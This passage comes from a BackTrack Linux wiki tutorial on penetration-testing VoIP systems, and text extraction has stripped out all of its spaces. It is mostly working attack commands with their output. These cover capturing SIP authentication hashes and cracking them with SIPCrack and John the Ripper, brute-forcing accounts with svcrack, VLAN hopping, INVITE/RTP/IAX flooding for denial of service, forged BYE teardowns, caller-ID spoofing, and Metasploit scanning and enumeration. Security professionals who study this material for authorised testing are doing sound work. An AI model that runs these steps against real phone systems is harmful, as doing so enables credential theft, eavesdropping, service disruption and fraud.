Selecting"User"tellsthetooltointerceptalltrafficbetweentheoneTarget,andtherestofthenetwork.
In"Conversation",twoendpointsareselectedandthenetworkisARPPoisonedtoonlyinterceptthetrafficbetweenthos
23/40
7/12/2015
UCSniffincludesmoreusefultoolsandattacksmodeslikeVLANhopping(usingACE)whichwillbediscussedlater.
Xplico
AlthoughXplicoisnotintheBacktrackvoiptoolsdirectory,itisaveryusefultoolforcapturingSIPandRTPtraffic(am
protocols).XplicocanbefoundintheBacktrack>DigitalForensics>ForensicAnalysismenu
IncaseitisnotpresentonyourBacktrackinstallationyoucansimplyinstallitbyissuingthefollowingcommand:
root@bt:~#aptgetinstallxplico
24/40
7/12/2015
XplicocanbeusedtocapturelivetrafficorimportaWiresharkPCAPcapturefile.EitherwayXplicowilldecodethecap
packetsandwillassemblethemintotheappropriateformatInourcaseitwillbeSIPandRTP.AfterexecutingXplicoyo
askedtologin,thedefaultusernameandpasswordare:xplico
OncewehavesuccessfullyloggedintoXplicowewillneedtocreateacase
WewillbeaskedtochoosebetweenalivecaptureortoimportaPCAPfileInthisexamplewewilluseXplicotoperform
capture(wewillArppoisonourtargetsinthebackgroundusingarpspoof).Nowwewillhavetochooseourcaseandcrea
session
Bychoosingournewlycreatedsessionwewillseeourmainstatisticspagewiththeoptiontochooseournetworkadapter
start/stopthecaptureprocess.
25/40
7/12/2015
HereisanexampleforcapturedSIPtraffic:
AnexampleforRTPdecodedtraffic:
26/40
7/12/2015
CapturingSIPAuthenticationusingSIPDump
SIPDumpisapartoftheSIPCracktoolssuite,itallowsperformingalivecaptureofSIPauthenticationdigestresponseor
dumpapreviouslycapturedsessionsfromaPCAPfile.SIPDumpUsage:
root@bt:/pentest/voip/sipcrack#./sipdumpieth0
SIPdump0.3(MaJoMu|www.codito.de)
Usage:sipdump[OPTIONS]
=filewherecapturedloginswillbewrittento
Options:
i=interfacetolistenon
p=usepcapdatafile
m=enterlogindatamanually
f""=setlibpcapfilter
*Youneedtospecifydumpfile
LivecaptureusingSIPDump:
root@bt:/pentest/voip/sipcrack#./sipdumpieth0auth.txt
*Usingdev'eth0'forsniffing
*Startingtosniffwithpacketfilter'tcporudporvlan'
*Dumpedloginfrom192.168.1.104>192.168.1.111(User:'200')
DumpingauthenticationdatafromaPCAPfile
root@bt:/pentest/voip/sipcrack#./sipdumpp/root/registration.pcapauth.txt
*Usingpcapfile'/root/registration.pcap'forsniffing
*Startingtosniffwithpacketfilter'tcporudporvlan'
*Exiting,sniffed1logins
SIPDumpwillwritetheauthenticationchallengeresponsetothespecifiedfilewhichlooksasfollows:
192.168.1.111"192.168.1.104"200"asterisk"REGISTER"sip:192.168.1.104"44b80d16""""MD5"8edc2d549294f6535070439fb069c968
192.168.1.111"192.168.1.104"200"asterisk"REGISTER"sip:192.168.1.104"46cce857""""MD5"4dfc7515936a667565228dbaa0293dfc
192.168.1.111"192.168.1.104"200"asterisk"REGISTER"sip:192.168.1.104"2252e8fe""""MD5"5b895c6ae07ed8391212119aab36f108
27/40
7/12/2015
Wewilldisscusscrackingthesechallengesintheattackingauthenticationchapter.
AttackingAuthentication
SIPcanbesusceptibleto2typesofauthenticationattacks,beforewetakealookattheseattackstypesletsunderstandho
registrationandauthenticationprocesstakesplace.SIPusesadigestauthenticationwhichisamechanismthattheHTTP
usesandknownasHTTPdigest.BecauseSIPisanASCIIbasedprotocoltheauthenticationdetailsarehashedinorderto
themtotransportincleartext.WhenaSIPclient(UserAgent)wantstoauthenticatewithaSIPserver,theservergenerate
sendsadigestchallengetotheclient,itcontainsthefollowingparameters:
RealmusedtoidentifycredentialswithinasSIPmessage,usuallyitisthesipdomain.Noncethisisanmd5uniquestr
isgeneratedbytheserverforeachregistrationrequestitismadefromatimestampandasecretphrasetoensureithasal
lifetimeandcouldbenotbeusedagain.Oncetheclientreceivesthedigestchallengeandtheuserentershiscredentialsth
usesthenoncetogenerateadigestresponseandsendsitbacktotheserver.
Withthatsaid,letstrytocrackthedigestresponseinordertoobtainavalidSIPaccountpassword.
CrackingSIPDigestresponsehashes
BacktrackprovidesagreattoolcalledSIPCrack,WealreadydiscussedhowtocaptureavalidSIPauthenticationdigestre
usingSIPDump.SIPCrackcanbefoundin
root@bt:/pentest/voip/sipcrack#
SIPCrackUsage:
28/40
7/12/2015
root@bt:/pentest/voip/sipcrack#./sipcrack
SIPcrack0.3(MaJoMu|www.codito.de)
Usage:sipcrack[OPTIONS][s|w]
=filecontainingloginssniffedbySIPdump
Options:
s=usestdinforpasswords
wwordlist=filecontainingallpasswordstotry
pnum=printcrackingprocesseverynpasswords(forw)
(ATTENTION:slowsdownheavily)
*Eitherworshastobegiven
SIPCrackcanoperateintwomodes:
Dictionaryattack
STDIN
Dictionaryattack
Backtrackprovidessomebasicdictionarieswhicharelocatedin:
root@bt:/pentest/passwords/wordlists
ButforthepurposeofthisarticleIwilluseanothergratetoolinbacktrackcalledCrunchwhichisusedtocreatecustomd
LetsusecrunchtocreateasixcharactersnumericdictionaryCrunchislocatedin:
root@bt:/pentest/passwords/crunch#
CrunchUsage:
usage:crunch[f/path/to/charset.lstcharsetname][owordlist.txt][t[FIXED]@@@@][sstartblock][cnumber]
Fordetailedcrunchusagecheckitsmanual:
root@bt:/pentest/passwords/crunch#mancrunch
Creatingasixcharsnumericdictionary:
root@bt:/pentest/passwords/crunch#./crunch66fcharset.lstnumerico/pentest/voip/sipcrack/sipass.txt
Crunchwillnowgenerate7000000bytesofdata
Crunchwillnowgenerate6MBofdata
Crunchwillnowgenerate0GBofdata
100%
WewilluseapreviouslycapturedsipcredentialsstoredbySIPDumpintheauth.txtfileanssipass.txtasthedictionary(w
createdusingcrunch)
29/40
7/12/2015
CrackingtheDigestResponse:
root@bt:/pentest/voip/sipcrack#./sipcrackwsipass.txtauth.txt
*FoundAccounts:
NumServerClientUserHash|Password
1192.168.1.101192.168.1.1042003a33e768ed6f630347f4b511371926bd
*Selectwhichentrytocrack(11):1
*GeneratingstaticMD5hash...0a84f78fde66bb15197eab961462dc2f
*Startingbruteforceagainstuser'200'(MD5:'3a33e768ed6f630347f4b511371926bd')
*Loadedwordlist:'sipass.txt'
*Startingbruteforceagainstuser'200'(MD5:'3a33e768ed6f630347f4b511371926bd')
*Tried123457passwordsin0seconds
*Foundpassword:'123456'
*Updatingdumpfile'auth.txt'...done
BruteForceattackusingJohnTheRipper
ForthisattackmodewewillbeusingJohntherippertoredirectjohnsoutputintotheFIFOfilewhichwellfeedintoSIP
CreatingaFIFOfile:
root@bt:/tmp#mkfifosipcrack
GeneratingpasswordsusingjohnandredirectingtheoutputtoourFIFOfile,forthisexamplewewillgenerateupto6dig
root@bt:~#john
[*]Thisscriptwilltakeyouto/pentest/passwords/jtr/
[*]Fromthere,run./john
root@bt:/pentest/passwords/jtr#./johnincremental=digitsstdout=6>/tmp/sipcrack
UsingourFIFOfiletocrackthepassword:
root@bt:/pentest/voip/sipcrack#./sipcrackw/tmp/sipcrackauth.txt
*FoundAccounts:
NumServerClientUserHash|Password
1192.168.1.111192.168.1.1042008edc2d549294f6535070439fb069c968
*Selectwhichentrytocrack(11):1
*GeneratingstaticMD5hash...0a84f78fde66bb15197eab961462dc2f
*Startingbruteforceagainstuser'200'(MD5:'8edc2d549294f6535070439fb069c968')
*Loadedwordlist:'/tmp/sipcrack'
*Startingbruteforceagainstuser'200'(MD5:'8edc2d549294f6535070439fb069c968')
*Tried3passwordsin0seconds
*Foundpassword:'123456'
*Updatingdumpfile'auth.txt'...done
BruteforcingSIPAccounts
WecanusesvcrackwhichisapartofthesipvicioustoolssuitetobruteforcesipaccountsAsingleSIPaccountdictionar
(Youcanaddavorvvforverbosity):
root@bt:/pentest/voip/sipvicious#./svcrack.pyu200dwordlist.txt192.168.1.104
|Extension|Password|
|200|123456|
AsingleSIPaccountbruteforcing:
30/40
7/12/2015
root@bt:/pentest/voip/sipvicious#./svcrack.pyu200r100000999999192.168.1.104
|Extension|Password|
|200|123456|
Use./svcrackhforallavailablearguments.
VLANHopping
UsuallyVoIPtrafficisconnectedtoadedicatedVLAN(VirtualLAN)aswesawinthetopologiessection.Thismeansth
cannotintercepttheVoIPtrafficbysniffingandArppoisoning.ThereasonforthatisthataVLANislikeaseparatenetw
itsownbroadcastdomainanddifferentIPrangethanthedatanetwork.VLANhoppingisawaytohoptoanotherVLA
forusBacktrackincludesthenecessarytoolstoperformthisattack.OnecommontopologyiswheretheIPPhonehasab
InternalSwitch,usuallythepcispluggedintothephonepcsocketandthephoneisconnectedfromitslan/swsocketto
networkswitchasfollows:
AtypicalCISCOswitchportconfigurationforVoIPwilllooksomethinglike:
Switch#conft
Enterconfigurationcommands,oneperline.EndwithCNTL/Z.
31/40
7/12/2015
Switch(config)#interfacefastEthernet0/1
Switch(configif)#switchportmodeaccess
Switch(configif)#switchportaccessvlan10
Switch(configif)#switchportvoicevlan20
TheIPphonewillbeconfiguredwiththeappropriateVLANID(20)andthePCdatatrafficwillflowthroughVLAN10.
beginhoppingaroundwewillhavetoenablesupportforthe802.1qprotocolinBacktrackbytyping:
root@bt:~#modprobe8021q
VoIPHopper
VoIPhopperisusedtohopintovoiceVlanbybehavinglikeanIPphoneitsupportsspecificswitchesandsupportssome
models.Itcurrentlysupportsthebrandslike:Cisco,AvayaandNortel.VoIPhopperwasdesignedtorununderBacktrack
currentlyhasthefollowingfeatures:DHCPClient,CDPGenerator,MACAddressSpoofingandVLANhopping.Voipho
usage:
root@bt:/pentest/voip/voiphopper#./voiphopper
voiphopperi<interface>c{0|1|2}anv<VLANID>
Pleasespecify1baseoptionmode:
CDPSniffMode(c0)
Example:voiphopperieth0c0
CDPSpoofModewithcustompacket(c1):
D(DeviceID)
P(PortID)
C(Capabilities)
L(Platform)
S(Software)
U(Duplex)
Example:voiphopperieth0c1E'SIP00070EEA5086'P'Port1'CHostL'CiscoIPPhone7940'S'P00308800'U1
CDPSpoofModewithpremadepacket(c2)
Example:voiphopperieth0c2
AvayaDHCPOptionMode(a):
Example:voiphopperieth0a
VLANHopMode(vVLANID):
Example:voiphopperieth0v200
NortelDHCPOptionMode(n):
Example:voiphopperieth0n
VoIPHopperprovidesmanymodesforattackpleaseusethehfordetailedinformation.
LetstakealookatanexampleofsniffingforCDPandrunaVLANHopintotheVoiceVLANinaCiscoenvironment.
HopperontheEthernetinterface,inthefollowingway:
root@bt:/pentest/voip/voiphopper#./voiphopperieth0c0
32/40
7/12/2015
VoIPHopperalsoallowsonetoVLANHoptoanarbitraryVLAN,withoutsniffingforCDP.IfyoualreadyknowtheVo
IDorwouldliketoVLANHopintoanotherVLANjustspecifythevlanid.
root@bt:/pentest/voip/voiphopper#./voiphopperieth0v20
VoIPHopper1.00RunninginVLANHopmode~TryingtohopintoVLAN2
AddedVLAN20toInterfaceeth0
Attemptingdhcprequestfornewinterfaceeth0.20
eth0.20Linkencap:EthernetHWaddr00:0c:29:84:98:b2
inet6addr:fe80::20c:29ff:fe84:98b2/64Scope:Link
UPBROADCASTNOTRAILERSRUNNINGMULTICASTMTU:1500Metric:1
RXpackets:0errors:0dropped:0overruns:0frame:0
TXpackets:9errors:0dropped:0overruns:0carrier:0
collisions:0txqueuelen:0
RXbytes:0(0.0B)TXbytes:2274(2.2KB)
ACE
ACEisanothertoolforvlanhoppingverysimilartoVoiphopperinusageandincludeanoptiontodiscoveralsoTFTPse
(configurationservers).ACEUsage:
root@bt:/pentest/voip/ace#./ace
ACEv1.0:AutomatedCorporate(Data)Enumerator
Usage:ace[iinterface][mmacaddress][ttftpserveripaddress|ccdpmode|vvoicevlanid|rvlaninterface|dverbosemode]
i<interface>(Mandatory)Interfaceforsniffing/sendingpackets
m<macaddress>(Mandatory)MACaddressofthevictimIPphone
t<tftpserverip>(Optional)tftpserveripaddress
c<cdpmode0|1>(Optional)0CDPsniffmode,1CDPspoofmode
v<voicevlanid>(Optional)EnterthevoicevlanID
r<vlaninterface>(Optional)RemovestheVLANinterface
d(Optional)Verbose|debugmode
Youcanmanuallyaddavlanhoporuseitsdiscoveryfeature
ModetospecifytheVoiceVLANID
Example:aceieth0v96m00:1E:F7:28:9C:8E
ModetoautodiscovervoicevlanIDinthelisteningmodeforCDP
Example:aceieth0c0m00:1E:F7:28:9C:8E
ModetoautodiscovervoicevlanIDinthespoofingmodeforCDP
Example:aceieth0c1m00:1E:F7:28:9C:8E
TIP:ToviewyourMACaddressinbacktrackuse:
root@bt:~#macchangerseth0
33/40
7/12/2015
ItdoesntmatterifyouusedvoiphopperoraceyoucannowinterceptVoIPtrafficwithtoolslikeucsniffbyspecifying
createdinterface.
Forexample:
root@bt:/pentest/voip/ucsniff#ucsniffieth0.20////
DenialOfService
AdenialofserviceattackonVoIPservicescanrenderituselessbycausinganintentionallydamagetothenetworkandV
systemsavailability.Thisattackcanoccurontwolevels,standardnetworkdosattacksandVoIPspecificdosattacks.Gen
willsendtonsofdatabyfloodingthenetworktoconsumeallitsresourcesoraspecificprotocolinordertooverwhelmit
ofrequests.LetstakeaquickoverviewofthetoolsavailableinBacktrack
Inviteflood
ThistoolcanbeusedtofloodatargetwithINVITErequestsitcanbeusedtotargetsipgateways/proxiesandsipphones.
root@bt:/pentest/voip/inviteflood#./inviteflood
invitefloodVersion2.0
June09,2006
Usage:
Mandatory
interface(e.g.eth0)
targetuser(e.g.""orjohn.doeor5000or"1+2105551212")
targetdomain(e.g.enterprise.comoranIPv4address)
IPv4addroffloodtarget(ddd.ddd.ddd.ddd)
floodstage(i.e.numberofpackets)
Optional
afloodtool"From:"alias(e.g.jane.doe)
iIPv4sourceIPaddress[defaultisIPaddressofinterface]
SsrcPort(065535)[defaultiswellknowndiscardport9]
DdestPort(065535)[defaultiswellknownSIPport5060]
llineStringlineusedbySNOM[defaultisblank]
ssleeptimebtwnINVITEmsgs(usec)
hhelpprintthisusage
vverboseoutputmode
Abasicusagesyntaxlookslikethis:
./invitefloodeth0target_extensiontarget_domaintarget_ipnumber_of_packets
34/40
7/12/2015
Aslongthetoolkeepsfloodingthesipgatewayitwillpreventusersfrommakingphonecalls.Youcanfloodthesipprox
inexistentextensionthusmakingitgeneratinga404notfoundjusttokeepitbusy.
Rtpflood
RtpfloodisusedtofloodatargetIPphonewithaUDPpacketcontainsaRTPdataInordertolaunchasuccessfulattack
rtpfloodyouwillneedknowtheRTPlisteningportontheremotedeviceyouwanttoattack,forexamplexlitesofphone
portis8000.
root@bt:/pentest/voip/rtpflood#./rtpflood
usage:./rtpfloodsourcenamedestinationnamesrcportdestportnumpacketsseqnotimestampSSID
Iaxflood
IAXFloodisatoolforfloodingtheIAX2protocolwhichisusedbytheAsteriskPBX.
root@bt:/pentest/voip/iaxflood#./iaxflood
usage:./iaxfloodsourcenamedestinationnamenumpackets
35/40
7/12/2015
Teardown
Teardownisusedtoterminateacallbysendingabyerequest
./teardowneth0extensionsip_proxy10.1.101.35CallIDFromTagToTag
FirstyouwillneedtocaptureavalidsipOKresponseanduseitsfromandtotagsandavalidcalleridvalue.
SIP/2.0200OK
Via:SIP/2.0/UDP192.168.1.105;branch=z9hG4bKkfnyfaol;received=192.168.1.105;rport=5060
From:"200";tag=hcykd
To:"200";tag=as644fe807
CallID:jwtgckolqnoylqf@backtrack
CSeq:134REGISTER
Allow:INVITE,ACK,CANCEL,OPTIONS,BYE,REFER,SUBSCRIBE,NOTIFY
Supported:replaces
Expires:3600
Contact:;expires=3600
Date:Tue,01Feb201117:55:42GMT
ContentLength:0
Ifyouspecifythevoptionyoucanseethepayload:
SIPPAYLOADforpacket:
BYEsip:200@192.168.1.104:5060SIP/2.0
Via:SIP/2.0/UDP192.168.1.105:9;branch=91ca1ba598ee44d5917061c30981c565
From:<sip:192.168.1.104>;tag=hcykd
To:200<sip:200@192.168.1.104>;tag=as644fe807
CallID:jwtgckolqnoylqf@backtrack
CSeq:2000000000BYE
MaxForwards:16
UserAgent:Hacker
ContentLength:0
Contact:<sip:192.168.1.105:9>
36/40
7/12/2015
SpoofingCallerID
ThereareseveralmethodsforspoofingCallerIDwhichwewontdiscussherebecauseitrequiresadifferentsetoftoolsa
equipmentwhichareirrelevanttothisarticlepurpose.SpoofingCallerIDinSIPisfairlyeasy,youjustneedtochangeth
requestINVITEfromheader.
INVITEsip:@127.0.0.1SIP/2.0
To:<sip:192.168.1.104>
Via:SIP/2.0/UDP192.168.1.104
From:"EvilHacker"
CallID:14810.0.1.45
CSeq:1INVITE
MaxForwards:20
Contact:<sip:127.0.0.1>
WewilltakealookatatoolwehavealreadydiscussedcalledInvitefloodwhichcanbeusedtosendspoofedinvitereque
root@bt:/pentest/voip/inviteflood#./invitefloodeth0201192.168.1.104192.168.1.1041a"Backtrack"
AttackingVoIPUsingMetasploit
TheMetasploitframeworkincludesseveralauxiliariesandmodulesdedicatedforVoIPexploitation.Youcanfindthemb
searchfunctionwithkeywordssuchassiporvoip.LetsLaunchmsfconsoleandperformasearchforavailablemo
root@bt:~#msfconsole
msf>searchsip
MetasploitVoIPModules
Heresacompletelistoftheavailablemodulesforyoureference:
Auxiliaries
scanner/sip/enumeratorSIPUsernameEnumerator(UDP)scanner/sip/enumerator_tcpSIPUsernameEnumerator
scanner/sip/optionsSIPEndpointScanner(UDP)scanner/sip/options_tcpSIPEndpointScanner(TCP)voip/sip_inv
SIPInviteSpoof
Exploits
windows/sip/aim_triton_cseqAIMTriton1.0.4CSeqBufferOverflowwindows/sip/sipxezphone_cseqSIPfoundry
sipXezPhone0.35aCSeqFieldOverflowwindows/sip/sipxphone_cseqSIPfoundrysipXphone2.6.0.27CSeqBufferO
unix/webapp/trixbox_langchoiceTrixboxlangChoicePHPLocalFileInclusion
ScanningSIPEnabledDevices
37/40
7/12/2015
MetasploitprovidesasipscannerauxiliarywhichcomesintwoflavorsTCPandUDP,wecanuseittodiscoverSIPenab
usingtheOPTIONmethod:LetsseeanexampleoftheUDPversion:scanner/sip/optionsauxiliaryAuxiliaryOptionsa
msf>useauxiliary/scanner/sip/options
msfauxiliary(options)>showoptions
Moduleoptions(auxiliary/scanner/sip/options):
NameCurrentSettingRequiredDescription
BATCHSIZE256yesThenumberofhoststoprobeineachset
CHOSTnoThelocalclientaddress
CPORT5060noThelocalclientport
RHOSTSyesThetargetaddressrangeorCIDRidentifier
RPORT5060yesThetargetport
THREADS1yesThenumberofconcurrentthreads
TOnobodynoThedestinationusernametoprobeateachhost
msfauxiliary(options)>setRHOSTS192.168.1.130/24
RHOSTS=>192.168.1.130/24
msfauxiliary(options)>run
[*]192.168.1.20200agent='GrandstreamHT502V1.2A1.0.1.35'verbs='INVITE,ACK,OPTIONS,CANCEL,BYE,SUBSCRIBE,NOTIFY,INFO,REFER,UPDATE'
[*]192.168.1.130200server='AsteriskPBX1.6.2.13'verbs='INVITE,ACK,CANCEL,OPTIONS,BYE,REFER,SUBSCRIBE,NOTIFY,INFO'
[*]Scanned256of256hosts(100%complete)
[*]Auxiliarymoduleexecutioncompleted
EnumeratingSIPextensions/Usernames
Thescanner/sip/enumeratorauxiliarycanbeusedtodiscovervalidSIPaccounts,itsupportstwomethodsofdiscovery:
andREGISTER,italsocomesintwoflavorsTCPandUDP.Auxiliaryoptions:
msf>usescanner/sip/enumerator
msfauxiliary(enumerator)>showoptions
Moduleoptions(auxiliary/scanner/sip/enumerator):
BATCHSIZE256yesThenumberofhoststoprobeineachset
CHOSTnoThelocalclientaddress
CPORT5060noThelocalclientport
MAXEXT9999yesEndingextension
METHODREGISTERyesEnumerationmethodtouseOPTIONS/REGISTER
MINEXT0yesStartingextension
PADLEN4yesCeropaddingmaximumlength
ExampleUsage:
msfauxiliary(enumerator)>setRHOSTS192.168.1.104
RHOSTS=>192.168.1.104
msfauxiliary(enumerator)>setMINEXT100
MINEXT=>100
msfauxiliary(enumerator)>setMAXEXT500
MAXEXT=>500
msfauxiliary(enumerator)>setPADLEN3
PADLEN=>3
msfauxiliary(enumerator)>run
[*]Founduser:200<sip:200@192.168.1.104>[Auth]
SpoofingCallerIDauxiliary
38/40
7/12/2015
Thevoip/sip_invite_spoofauxiliarywillcreateafakeSIPinviterequestmakingthetargeteddeviceringanddisplayfake
information.AuxiliaryOptions:
msf>usevoip/sip_invite_spoof
msfauxiliary(sip_invite_spoof)>showoptions
Moduleoptions(auxiliary/voip/sip_invite_spoof):
MSGTheMetasploithasyouyesThespoofedcalleridtosend
SRCADDR192.168.1.1yesThesipaddressthespoofedcalliscomingfrom
ExampleUsage:
msfauxiliary(sip_invite_spoof)>setRHOSTS192.168.1.104
RHOSTS=>192.168.1.104
msfauxiliary(sip_invite_spoof)>run
[*]SendingFakeSIPInviteto:192.168.1.104
ExploitingVoIPsystems
MetasploitincludesseveralexploitsforsipclientsoftwareandevenfortheTrixboxPBXwebmanagementinterface.
AlthoughthisisnotaSIPspecificvulnerabilityitisstillrelatedandcanenableafullcontrolbyanattackeronaPBX.
ClosingWords
Ihopeyouvefoundthisdocumentinformative,pleasekeepinmindthatBacktrackLinuxprovidesmanytoolsandfeatur
haventcoveredhere.TakethetimetobrowsethetoolsreadthemanualsandREADMEsIamsureyoullfindtherightt
job.
39/40
7/12/2015
FeelfreetodiscussthetoolsandmethodsmentionedhereintheBacktrackLinuxForumswewouldlovetohereyourfee
andexperiences.
http://www.backtracklinux.org/forums/
AboutTheAuthor
Shairod(aka@NightRang3r)isafulltimePenTesteratAvnetInformationSecurity&RiskManagementinIsraelHeh
OffensivesecurityOSCPandOSCEcertifications(amongothers)andmanageshisblogathttp://exploit.co.il
References
http://en.wikipedia.org/wiki/Session_Initiation_Protocol
http://tools.ietf.org/html/rfc3261
http://www.hackingvoip.com/
Retrievedfrom"http://www.backtracklinux.org/wiki/index.php?title=Pentesting_VOIP&oldid=789"
Thispagewaslastmodifiedon12June2011,at19:16.
40/40

Pentesting VOIP - BackTrack Linux

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Pentesting VOIP - BackTrack Linux

Uploaded by

Copyright:

Available Formats

7/12/2015

You might also like